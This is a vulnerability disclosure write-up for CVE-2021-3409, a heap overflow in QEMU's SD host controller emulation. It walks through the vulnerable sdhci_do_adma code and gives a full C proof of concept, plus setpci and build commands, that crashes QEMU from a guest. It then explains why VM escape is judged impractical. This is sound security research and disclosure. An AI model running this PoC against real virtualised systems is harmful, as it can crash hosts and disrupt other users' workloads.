CVE: CVE-2021-3409

Tested Versions:

  • QEMU version under 5.2.50

Product URL(s):

Description of the vulnerability

QEMU version 5.2.50 is susceptible to vulnerabilities which, when successfully exploited, could lead to the disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).

SDHCI is Secure Digital Host Controller Interface. Secure Digital is a proprietary non-volatile memory card format developed by the SD Association (SDA) for portable devices. SDHCI code in QEMU is SD Controller emulation implementation based on SD Host Controller Specification Ver2.0 by Technical Committee SD Association.

This image below, contains registers of SDHCI device, by writing to some register we can interact with the device.

21-3409_Fig1

Figure 1 : SDHCI Registers

This vulnerable code resides in the SDHCI component in QEMU code. The vulnerability happens when blksize/block size (size of the block buffer) is changed during in the middle or after unfinished data transfer, we can change blksize by writing to offset 0x4 of the register. The code is miscalculated while storing data in the block buffer’s current offset. Current offset of the block buffer is stored on the data_count variable. When trying to continue the transfer to/from block buffer, the length of data is calculated as blksize - data_count, this length is to make the block buffer filled, but because in the middle of transfer blksize can change such as ‘0’ and the data_count is not cleared, calculation blksize - data_count can overflow, this calculation make the transfer with large size (such as 0xfffffe01-0xffffffff), and with this length obviously can make heap overflow to/from block buffer.

The vulnerability resides in the sdhci_do_adma function. sdhci_do_adma is a function that processes data transfer between sdhci and DMA buffers in guest system memory.

/* Advanced DMA data transfer */
static void sdhci_do_adma(SDHCIState *s)
{
   unsigned int begin, length;
   const uint16_t block_size = s->blksize & BLOCK_SIZE_MASK;
   ADMADescr dscr = {};
   int i;
   ...
   for (i = 0; i < SDHC_ADMA_DESCS_PER_DELAY; ++i) {
       s->admaerr &= ~SDHC_ADMAERR_LENGTH_MISMATCH;

       get_adma_description(s, &dscr);
       ...
       length = dscr.length ? dscr.length : 64 * KiB;

       switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           if (s->trnmod & SDHC_TRNS_READ) {
               while (length) {
                   ...
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin);
                   dscr.addr += s->data_count - begin;
                   ...
               }
           } else {
               ...
           }
           ...
       ...
       }
       ...
       /* ADMA transfer terminates if blkcnt == 0 or by END attribute */
       if (((s->trnmod & SDHC_TRNS_BLK_CNT_EN) &&
                   (s->blkcnt == 0)) || (dscr.attr & SDHC_ADMA_ATTR_END)) {
           ...
           sdhci_end_transfer(s);
           return;
       }

   }
   /* we have unfinished business - reschedule to continue ADMA */
   timer_mod(s->transfer_timer,
                  qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + SDHC_TRANSFER_DELAY);
} 

This function will transfer to/from DMA based on the adma description. Adma description is given by get_adma_description and will be stored in desc variable.

static void get_adma_description(SDHCIState *s, ADMADescr *dscr)
{
   uint32_t adma1 = 0;
   uint64_t adma2 = 0;
   hwaddr entry_addr = (hwaddr)s->admasysaddr;
   switch (SDHC_DMA_TYPE(s->hostctl1)) {
   case SDHC_CTRL_ADMA2_32:
       dma_memory_read(s->dma_as, entry_addr, &adma2, sizeof(adma2));
       adma2 = le64_to_cpu(adma2);
       /* The spec does not specify endianness of descriptor table.
        * We currently assume that it is LE.
        */
       dscr->addr = (hwaddr)extract64(adma2, 32, 32) & ~0x3ull;
       dscr->length = (uint16_t)extract64(adma2, 16, 16);
       dscr->attr = (uint8_t)extract64(adma2, 0, 7);
       dscr->incr = 8;
       break;
   case SDHC_CTRL_ADMA1_32:
       dma_memory_read(s->dma_as, entry_addr, &adma1, sizeof(adma1));
       adma1 = le32_to_cpu(adma1);
       dscr->addr = (hwaddr)(adma1 & 0xFFFFF000);
       dscr->attr = (uint8_t)extract32(adma1, 0, 7);
       dscr->incr = 4;
       if ((dscr->attr & SDHC_ADMA_ATTR_ACT_MASK) == SDHC_ADMA_ATTR_SET_LEN) {
           dscr->length = (uint16_t)extract32(adma1, 12, 16);
       } else {
           dscr->length = 4 * KiB;
       }
       break;
   case SDHC_CTRL_ADMA2_64:
       dma_memory_read(s->dma_as, entry_addr, &dscr->attr, 1);
       dma_memory_read(s->dma_as, entry_addr + 2, &dscr->length, 2);
       dscr->length = le16_to_cpu(dscr->length);
       dma_memory_read(s->dma_as, entry_addr + 4, &dscr->addr, 8);
       dscr->addr = le64_to_cpu(dscr->addr);
       dscr->attr &= (uint8_t) ~0xC0;
       dscr->incr = 12;
       break;
   }
}

There is a different ADMA version here, which can be controlled by writing hostctl register. In this case, we can only use SDHC_CTRL_ADMA2_32 and SDHC_CTRL_ADMA1_32, for SDHC_CTRL_ADMA2_64 the code it is there. This QEMU device is not supported to setting DMA type to SDHC_CTRL_ADMA2_64. We will relook at this later. In this case, we will be using ADMA2_32.

ADMA description describes the physical memory address, length, and attribute that we want to operate, such as read/write to/from the buffer to/from system memory. SDHCI will read ADMA description from physical memory with the address defined in admasysaddr. We can control this by writing address value to ADMA System Address register in offset 0x58.

21-3409_Fig2

Figure 2 : ADMA Descriptor diagram

Later, ADMA description will be used as information for data transfer. For example, the code below is used to transfer data from system memory to the device. In the block else also there is transfer data from device to system memory by setting some bits to SDHC_ADMA_ATTR_ACT_TRAN, and we can set the trnmod register if we want to transfer data to or from system memory.

       switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           if (s->trnmod & SDHC_TRNS_READ) {
               while (length) {
                   if (s->data_count == 0) {
                       sdbus_read_data(&s->sdbus, s->fifo_buffer, block_size); // fill the buffer from sd
                   }
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin; // [1]
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin); // [2]
                   dscr.addr += s->data_count - begin;
                   if (s->data_count == block_size) {
                       s->data_count = 0; // [3]
                       if (s->trnmod & SDHC_TRNS_BLK_CNT_EN) {
                           s->blkcnt--;
                           if (s->blkcnt == 0) {
                               break;
                           }
                       }
                   }
               }
           }
          else {
               ...
          }

The above code will transfer data from the device to the system memory via DMA. This code will loop while length is not zero, and will transfer block by block via dma_memory_write. It will transfer from &s->fifo_buffer[begin] to system memory described in dscr.addr with length s->data_count-begin. This loop finishes when s->blkcnt is zero or length is zero, but we can make this code don’t care with s->blkcnt by unsetting a bit defined in SDHC_TRNS_BLK_CNT_EN.

After this loop is finished, we can make s->data_count by making the last loop to execute code [1], and code at [3] is not executed.

This code below will be executed after the data transfer loop.

       /* ADMA transfer terminates if blkcnt == 0 or by END attribute */
       if (((s->trnmod & SDHC_TRNS_BLK_CNT_EN) &&
                   (s->blkcnt == 0)) || (dscr.attr & SDHC_ADMA_ATTR_END))      
       {
           trace_sdhci_adma_transfer_completed();
           ...
           sdhci_end_transfer(s);
           return;
       }

   }

   /* we have unfinished business - reschedule to continue ADMA */
   timer_mod(s->transfer_timer,
                  qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + SDHC_TRANSFER_DELAY);

There is an if check if s->blkcnt is zero or ADMA description have an END attribute, otherwise we have unfinished transfer and will reschedule to continue ADMA transfer, it will merely execute sdhci_do_adma again in the future.

Later, we can change the block size register to zero and then continue sdhci_do_adma again. After that, the same code as I have explained earlier will be executed again. The following vulnerable code below will trigger the bug.

                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size; // [1]
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin); // [2]
                   dscr.addr += s->data_count - begin; 

Here, we know s->data_count comes from the previous unfinished transfer, and this value is not zero, and it will be stored to begin variable. The else block will then be executed and assign s->data_count with block_size. Later, dma_memory_write will be called with length s->data_count-begin, because s->data_count is zero (that comes from block_size) and begin is not zero, there will be an overflow which results in transfer with large size. So, we have heap overflow read that will transfer fifo_buffer to system memory.

On the other side, we can do heap overflow write to by controlling the execution to this code as shown below.

} else {
               while (length) {
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_read(s->dma_as, dscr.addr,
                                   &s->fifo_buffer[begin],
                                   s->data_count - begin);
                   dscr.addr += s->data_count - begin;
                   if (s->data_count == block_size) {
                       sdbus_write_data(&s->sdbus, s->fifo_buffer, block_size);
                       s->data_count = 0;
                       if (s->trnmod & SDHC_TRNS_BLK_CNT_EN) {
                           s->blkcnt--;
                           if (s->blkcnt == 0) {
                               break;
                           }
                       }
                   }
               }
           }

This is similar to the earlier code, but it will transfer from system memory to fifo_buffer via DMA, that means we have heap overflow write to fifo_buffer.

The general idea for exploiting heap overflow vulnerability is usually by overwriting some interesting data in the heap, such as a pointer, function pointer to get RCE or other value that can help us do further exploitation.

To trigger this bug, we need to direct execution to the sdhci_do_adma function, but before we need to set up several registers such as transfer mode, block size, and host control register. We need to communicate with the device too. In this case, we can communicate by writing the PCI address of the device, to do that we write our value to the physical memory address.

To know where the address is, use lspci -v command in guest OS. There is a description of the SD Host Controller in the lspci -v output, we can see it contains a memory location at 0xfebf1000. So if we want to write a register at some offset, it will start from offset zero at 0xfebf1000, and offset n at 0xfebf1000+n.

./21-3409_Fig3

We will need to read and write memory to 0xfebf1000 base address in physical memory to interact with the device. To read and write to a physical memory address, we can map a physical address via /dev/mem using mmap syscall in Linux guest. This code below explains how to mmap the device via /dev/mem.

#define SDHCI_ADDR 0xfebf1000
#define SDHCI_SIZE 256
unsigned char* sdhci_map = NULL;
int fd;
void* devmap( size_t offset, size_t size)
{
   void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_FILE|MAP_SHARED, fd, offset );
   if ( result == (void*)(-1) ) {
       perror( "mmap" );
   }
   return result;
}
int main( int argc, char **argv ) {
   fd = open( "/dev/mem", O_RDWR | O_SYNC );
   if ( fd == -1 ) {
       perror( "open /dev/mem" );
       return 0;
   }
   sdhci_map = devmap(SDHCI_ADDR, SDHCI_SIZE);
   printf("success %p\n", sdhci_map);
   ...
}

First, open /dev/mem to get a file descriptor stored in the fd variable, and then the fd variable is used as the fourth parameter in mmap. Function devmap is used to map physical addresses via /dev/mem. To map an SDHCI address at 0xfebf1000, pass the address as the first parameter, and then we use 256 as the size of mmap because the size of the SDHCI registers is 256. After this, we just read and write to memory via a pointer stored in the sdhci_map variable to interact with the device.

To trigger vulnerable code, we need to set up several registers. Following the specification, I set power control to 0x3b, and host control register to 0xd7 to enable Advanced DMA. After that, we set block size register, and transfer mode register, here we set transfer mode register to 0x21 to perform read operation from device memory to system memory. Following the specification, we can write a command register to trigger data transfer and eventually call sdhci_do_adma where the vulnerability resides.

static void
sdhci_write(void *opaque, hwaddr offset, uint64_t val, unsigned size)
{
   SDHCIState *s = (SDHCIState *)opaque;
   unsigned shift =  8 * (offset & 0x3);
   uint32_t mask = ~(((1ULL << (size * 8)) - 1) << shift);
   uint32_t value = val;
   value <<= shift;

   if (timer_pending(s->transfer_timer)) {
       sdhci_resume_pending_transfer(s);
   }

   switch (offset & ~0x3) {
   ...
   case SDHC_TRNMOD:
       /* DMA can be enabled only if it is supported as indicated by
        * capabilities register */
       if (!(s->capareg & R_SDHC_CAPAB_SDMA_MASK)) {
           value &= ~SDHC_TRNS_DMA;
       }
       MASKED_WRITE(s->trnmod, mask, value & SDHC_TRNMOD_MASK);
       MASKED_WRITE(s->cmdreg, mask >> 16, value >> 16);

       /* Writing to the upper byte of CMDREG triggers SD command generation */
       if ((mask & 0xFF000000) || !sdhci_can_issue_command(s)) {
           break;
       }

       sdhci_send_command(s);
       break;
     
}

sdhci_write function is the function that handles every write memory operation to SDHCI register. If we write the upper byte of command register, it will trigger sdhci_send_command based on the above codes.

static void sdhci_send_command(SDHCIState *s)
{
   SDRequest request;
   uint8_t response[16];
   int rlen;

   s->errintsts = 0;
   s->acmd12errsts = 0;
   request.cmd = s->cmdreg >> 8;
   request.arg = s->argument;
   sdhci_update_irq(s);
   ...
   if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
       s->data_count = 0;
       sdhci_data_transfer(s);
   }
}

The code above, sdhci_send_command will call sdhci_data_transfer to perform data transfer.

/* Perform data transfer according to controller configuration */

static void sdhci_data_transfer(void *opaque)
{
   SDHCIState *s = (SDHCIState *)opaque;

   if (s->trnmod & SDHC_TRNS_DMA) {
       switch (SDHC_DMA_TYPE(s->hostctl1)) {
       ...
       case SDHC_CTRL_ADMA2_32:
           if (!(s->capareg & R_SDHC_CAPAB_ADMA2_MASK)) {
               trace_sdhci_error("ADMA2 not supported");
               break;
           }
           sdhci_do_adma(s);
           break;
        ...
   }
   ...
}

By controlling the transfer mode and host control register, we can direct execution to sdhci_do_adma.

In the sdhci_do_adma will transfer data between device and system memory, we make after that transfer will unfinished, and the device will call sdhci_data_transfer (which will call sdhci_do_adma again) to continue transfer in the future. Before the transfer is continued we set the block size register to zero, to trigger the bug in the next transfer in sdhci_do_adma function.

Every read and write operation in the SDHCI register will be handled by sdhci_write and sdhci_read operation. These functions will check if there is an unfinished transfer, it will continue transfer by calling sdhci_resume_pending_transfer.

static void
sdhci_write(void *opaque, hwaddr offset, uint64_t val, unsigned size)
{
   SDHCIState *s = (SDHCIState *)opaque;
   unsigned shift =  8 * (offset & 0x3);
   uint32_t mask = ~(((1ULL << (size * 8)) - 1) << shift);
   uint32_t value = val;
   value <<= shift;

   if (timer_pending(s->transfer_timer)) {
       sdhci_resume_pending_transfer(s);
   }
   ...
} 

sdhci_resume_pending_transfer is simply just calling sdhci_data_transfer which will call sdhci_do_adma again.

static void sdhci_resume_pending_transfer(SDHCIState *s)
{
   timer_del(s->transfer_timer);
   sdhci_data_transfer(s);
}

Before that, we need to store ADMA description, and we store the address of ADMA description to ADMA System Address register in the SDHCI register. To simplify, I write the ADMA description structure in the physical address 0, and then we write 0 value to the ADMA system address register in the SDCHI register.

void writeb(unsigned char* mem, int idx, unsigned char val) {
   mem[idx] = val;
}

void writew(unsigned char* mem, int idx, unsigned short val) {
   *((unsigned short*)&mem[idx]) = val;
}

void writel(unsigned char* mem, int idx, unsigned int val) {
   *((unsigned int*)&mem[idx]) = val;
}

void writeq(unsigned char* mem, int idx, unsigned long val) {
   *((unsigned long*)&mem[idx]) = val;
}
int main( int argc, char **argv ) {
   fd = open( "/dev/mem", O_RDWR | O_SYNC );
   if ( fd == -1 ) {
       perror( "open /dev/mem" );
       return 0;
   }
   unsigned char* page = devmap(MEM_ADDR, MEM_SIZE);
   printf("success %p\n", page);
   memset(page, 0, 1024);
   writeb(page, 0x00, 0x29); // SDHC_ADMA_ATTR_ACT_TRAN
   writeb(page, 0x02, 0x10);
   writel(page, 0x04, MEM_ADDR); 
   writeb(page, 0x08, 0x39); // SDHC_ADMA_ATTR_ACT_LINK
   writel(page, 0xc, MEM_ADDR);
   ...
   writeq(sdhci_map, 0x58, MEM_ADDR); // system adma address
   ...
} 

Here, we create two ADMA descriptions. Each description has 0x8 size that describes the attribute, length, and buffer address in physical memory used to data transfer or point another ADMA description structure.

For the first transfer, it will use ADAM description at address 0, I set up an ADMA description with SDHC_ADMA_ATTR_ACT_TRAN, that is used for data transfer. After the first transfer, the ADMA system address register will be added by 8 to point the next ADMA description structure. Here, I set up an ADMA description structure with SDHC_ADMA_ATTR_ACT_LINK as an attribute and address with 0, with this attribute, the ADMA system address will be stored again with address 0. In this case, we make simplicity, so we do not need to create a bunch of ADMA descriptors, we create an ADMA description in a loop.

So, sdhci_do_adma will be called three times: First transfer it just needed to fill up the data_count variable. Second, sdhci_do_adma will be called again by sdhci_resume_pending_transfer. At the same time, it will write the block size register to zero. In the third time, sdhci_do_adma will be called again by sdhci_resume_pending_transfer, here with ADMA description stored at address 0x00, ADMA description address stored at address 0x00 will perform data transfer, because data_count is filled by previous transfer and block size is zero and then the bug will be triggered.

/* Advanced DMA data transfer */

static void sdhci_do_adma(SDHCIState *s)
{
   unsigned int begin, length;
   const uint16_t block_size = s->blksize & BLOCK_SIZE_MASK;
   ADMADescr dscr = {};
   int i;
   ...
      switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           if (s->trnmod & SDHC_TRNS_READ) {

                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size; // [1]
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin); // [1]
                   dscr.addr += s->data_count - begin; 
/* Advanced DMA data transfer */

static void sdhci_do_adma(SDHCIState *s)
{
       switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           ...
           s->admasysaddr += dscr.incr;
           break;
       case SDHC_ADMA_ATTR_ACT_LINK:   /* link to next descriptor table */
           s->admasysaddr = dscr.addr;
           trace_sdhci_adma("link", s->admasysaddr);
           break;
         ...
         }
      ...
}

Here is below the final code to trigger the bug, if we run in guest Linux it will make QEMU segmentation fault and crash. Before running this code, we need to activate DMA transfer by enabling master bit in SDHCI using this command: sudo setpci -s 00:04.0 4.B=7, 00:04.0 is the PCI device number, and 4.B=7 is used to activate bus master bit.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdint.h>
#include <assert.h>

#define SDHCI_ADDR 0xfebf1000
#define SDHCI_SIZE 256
#define MEM_ADDR 0x00000000
#define MEM_SIZE (4096)

unsigned char* sdhci_map = NULL;
int fd;

void* devmap( size_t offset, size_t size)
{
   void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_FILE|MAP_SHARED, fd, offset );
   if ( result == (void*)(-1) ) {
       perror( "mmap" );
   }
   return result;
}

void writeb(unsigned char* mem, int idx, unsigned char val) {
   mem[idx] = val;
}

void writew(unsigned char* mem, int idx, unsigned short val) {
   *((unsigned short*)&mem[idx]) = val;
}

void writel(unsigned char* mem, int idx, unsigned int val) {
   *((unsigned int*)&mem[idx]) = val;
}

void writeq(unsigned char* mem, int idx, unsigned long val) {
   *((unsigned long*)&mem[idx]) = val;
}

int main( int argc, char **argv ) {
   fd = open( "/dev/mem", O_RDWR | O_SYNC );
   if ( fd == -1 ) {
       perror( "open /dev/mem" );
       return 0;
   }
   unsigned char* page = devmap(MEM_ADDR, MEM_SIZE);
   printf("success %p\n", page);
   memset(page, 0, 1024);
   writeb(page, 0x00, 0x29); // SDHC_ADMA_ATTR_ACT_TRAN
   writeb(page, 0x02, 0x10);
   writel(page, 0x04, MEM_ADDR);
   writeb(page, 0x08, 0x39); // SDHC_ADMA_ATTR_ACT_LINK
   writel(page, 0xc, MEM_ADDR);
   getchar();
   sdhci_map = devmap(SDHCI_ADDR, SDHCI_SIZE);
   printf("success %p\n", sdhci_map);
   writew(sdhci_map, 0x28, 0x3bd7); // power and host control
   writeb(sdhci_map, 0x05, 0x2c); // block size
   writeb(sdhci_map, 0x0c, 0x21); // transfer mode = SDHC_TRNS_READ
  writeq(sdhci_map, 0x58, MEM_ADDR); // system adma address

   writew(sdhci_map, 0x0e, 0x846e); // command
   writew(sdhci_map, 0x04, 0x0000); // block size
   writew(sdhci_map, 0x08, 0x0); // argument 0, write anything just need to resume the transfer.
   getchar();
   close( fd );
}
// sudo setpci -s 00:04.0 4.B=7 && gcc -o new new.c && sudo ./new

Figure 3 : PoC that trigger the bug

21-3409_Fig4

Figure 4 : Crashing QEMU

21-3409_Fig5

Figure 5 : Stack trace QEMU when the crash happens

If we look at the stack trace, we will see a crash coming from sdhci_do_adma, and we pass len in dma_memory_read with a significant number (0xffffff80).

We are trying to exploit this vulnerability but turns out this vulnerability is unlikely to be exploitable because we cannot fully control the overflow length.

If we can control the overflow length, we can easily do Out-of-bound read and write quickly. In this case, we cannot fully control the length of overflow. We can make the length that will be passed to dma_memory_read/write in range 0xfffffe01-0xffffffff, so we must almost overwrite and read memory almost 4GB size.

static void sdhci_do_adma(SDHCIState *s)
{
   unsigned int begin, length;
   const uint16_t block_size = s->blksize & BLOCK_SIZE_MASK;
   ...
          length = dscr.length ? dscr.length : 64 * KiB;
          ...
               while (length) {
                   if (s->data_count == 0) {
                       sdbus_read_data(&s->sdbus, s->fifo_buffer, block_size);
                   }
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin);
                   dscr.addr += s->data_count - begin;
                   if (s->data_count == block_size) {
                       s->data_count = 0;
                       if (s->trnmod & SDHC_TRNS_BLK_CNT_EN) {
                           s->blkcnt--;
                           if (s->blkcnt == 0) {
                               break;
                           }
                       }
                   }
               }
    ...
} 

The length is 16-bit size because it comes from dscr.length with 16-bit size but stored in unsigned int. This device has an adequately checked block size register (the code I’ve not shown in here), so the block_size variable is never bigger than 0x200, and it affects the data_count variable which never has a value more significant than 0x200. So, this code doesn’t have another integer overflow that can make controlling the length that will be passed to dma_memory_read/write, we only have a limitation that length that will be passed (third parameter of dma_memory_write/read, not length variable) is in range 0xfffffe01-0xffffffff.

With this limitation, we need to spray the heap to make the heap grow until the heap is bigger enough while doing the transfer, so the transfer will not segfault because accessing unmapped memory. And then, we need to create a 4GB buffer in system memory, to store our payload, the buffer will be used to read 4GB data from Qemu heap to retrieve information leak, after leak we perform write operation to write 4GB data to the heap. 4GB buffer in system memory must be physically contiguous because we talk physically with the device via DMA read and write operation. This is almost impossible because random access memory behaviour makes it hard to request 4GB physically contiguous memory to kernel even we write kernel driver to do it. There’s a way to do it in Linux by reserving memory location by setting the kernel boot parameter. Kernel boot parameters are text strings which are interpreted by the system to change specific behaviours and enable or disable certain features, kernel boot parameters will only affect if we restart the machine, even with this scenario this is far from reality when attackers need to restart the machine to perform VM escape.

Suppose, we can allocate physically contiguous memory in the kernel because we have a big RAM to do it, this is still impossible because we only have 32-bit ADMA, that means, we cannot store our buffer in the address above 4GB because SDHCI device in this Qemu code does not support it. We cannot store a buffer below 4GB address, because there is a lot of reserved memory used by kernel, bios, or memory-mapped I/O, which can make guest OS unstable and crash. You can see the information for the Linux OS in the image below. We think it would be similar to other operating systems.

21-3409_Fig6

Figure 6 : dmesg command show reserved memory below 4GB address

This code below support 64-bit ADMA. You can see, we can use 64-bit ADMA by setting host control register

static void get_adma_description(SDHCIState *s, ADMADescr *dscr)
{
   uint32_t adma1 = 0;
   uint64_t adma2 = 0;
   hwaddr entry_addr = (hwaddr)s->admasysaddr;
   switch (SDHC_DMA_TYPE(s->hostctl1)) {
   ...
   case SDHC_CTRL_ADMA2_64:
       dma_memory_read(s->dma_as, entry_addr, &dscr->attr, 1);
       dma_memory_read(s->dma_as, entry_addr + 2, &dscr->length, 2);
       dscr->length = le16_to_cpu(dscr->length);
       dma_memory_read(s->dma_as, entry_addr + 4, &dscr->addr, 8);
       dscr->addr = le64_to_cpu(dscr->addr);
       dscr->attr &= (uint8_t) ~0xC0;
       dscr->incr = 12;
       break;
   }
}

There is another check when we will perform 64-bit ADMA by check capabilities register in sdhci_data_transfer function which will call sdhci_do_adma if validation is correct.

/* Perform data transfer according to controller configuration */
static void sdhci_data_transfer(void *opaque)
{
   SDHCIState *s = (SDHCIState *)opaque;

   if (s->trnmod & SDHC_TRNS_DMA) {
       switch (SDHC_DMA_TYPE(s->hostctl1)) {
       ...
       case SDHC_CTRL_ADMA2_64:
           if (!(s->capareg & R_SDHC_CAPAB_ADMA2_MASK) ||
                   !(s->capareg & R_SDHC_CAPAB_BUS64BIT_MASK)) {
               trace_sdhci_error("64 bit ADMA not supported");
               break;
           }

           sdhci_do_adma(s);
           Break;
    ...
}

Capabilities register is the read-only register that stores information about the host controller. Capabilities register value is set to default by some constant defined in sdhci_internal.h.

/*
* Default SD/MMC host controller features information, which will be
* presented in CAPABILITIES register of generic SD host controller at reset.
*
* support:
* - 3.3v and 1.8v voltages
* - SDMA/ADMA1/ADMA2
* - high-speed
* max host controller R/W buffers size: 512B
* max clock frequency for SDclock: 52 MHz
* timeout clock frequency: 52 MHz
*
* does not support:
* - 3.0v voltage
* - 64-bit system bus
* - suspend/resume
*/

From capabilities registers bit value for R_SDHC_CAPAB_BUS64BIT_MASK is unset and there is a description from the author, this device does not support 64-bit ADMA register, so that means we can’t make a buffer in physical memory above 4GB address. We can’t perform full exploitation like VM escape using this vulnerability with this limitation and condition. We only have an exploit that performs DOS that makes the QEMU crash and exit.

Timeline

  • 2020-12-28 Reported to Vendor
  • 2021-03-09 Vendor assign CVE